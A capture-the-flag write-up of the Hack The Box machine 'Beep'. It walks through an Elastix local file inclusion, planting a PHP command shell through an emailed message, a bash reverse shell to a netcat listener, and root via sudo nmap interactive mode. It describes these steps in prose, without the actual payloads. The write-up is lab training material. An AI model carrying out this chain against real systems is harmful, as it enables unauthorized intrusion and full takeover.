HTB: Beep Writeup w/o Metasploit
Introduction
Beep was a pretty fun box to play with. We did a live hacking session on this box. It was cool to have people with different skill sets from diverse backgrounds all working together on Beep. We ended up finding a few different ways to pop a shell. We will explore one of those vectors within this writeup. If you would like to see the other exploits, please check out the video walkthrough here.
Recon
We started off this challenge with a few Nmap scans. The version scan showed us a few interesting ports and services running.
Port 80 and 443 are open and appear to be hosting some sort of web service. When we browse to the address, we are welcomed with a username and password form for elastix. Elastix is a unified communication software that provides IP PBX, email, instant messaging, faxing, and other communication services. After exploiting it a bit more, you will learn that tools like this are used a lot in call centers, or even at a help desk or system admin position.
Enumeration
We were curious about what elastix was and if there were any known exploits so we threw it in a Google search. As a result, we found an interesting local file inclusion exploit, which we also saw in a searchsploit search.
We were not entirely too sure this would work because we did not have a version number for our elastix service. Fortunately, it did work, and we were able to read files on the system. FYI: right click and select view source so the output is clean and easier to read.
We can read local files, even the sensitive ones. From here we will try to get a shell to execute some remote commands. To do this we will need to upload some php to the system, and then interact with it using our web browser. First let us upload a line of php to the “asterisk” user’s mailbox (we found the user account from the /etc/passwd file above). We can do this by connecting to the smtp server on port 25 and sending the asterisk account an email.
The email is sent. Let us use the LFI vulnerability to look at the directory (/var/mail/asterisk) storing our mail.
The email is there, now all we must do is send commands to the ‘kage’ parameter we set in that php string.
Running whoami returns the “asterisk” user account. Running commands works, so let us pass a command to connect back to a netcat listener running on our attacking machine.
Running that line above (from a browser) uses bash to connect back to our netcat listener on 443. We have a shell now we can use to execute remote commands, now let us escalate our privileges. Running sudo -l shows a few commands we can run as root.
GTFOBins has an priv escalation exploit for nmap. In a nutshell, you’ll start nmap in interactive mode, make sure to run it as sudo. Once that’s done, run “!sh” to get root access.
Conclusion
And we are done, we can go and grab all our flags now. This was a fun box. This was one way to pop a shell on Beep. Remember, we were able to pop this because Elastix had an LFI vulnerability that we exploited to execute remote commands to connect by to our netcat listener. We were able to escalate privileges due to the special permissions the user can execute using sudo. If you would like to watch this exploit and the others, please check watch our walkthrough here on YouTube. Thanks for reading!
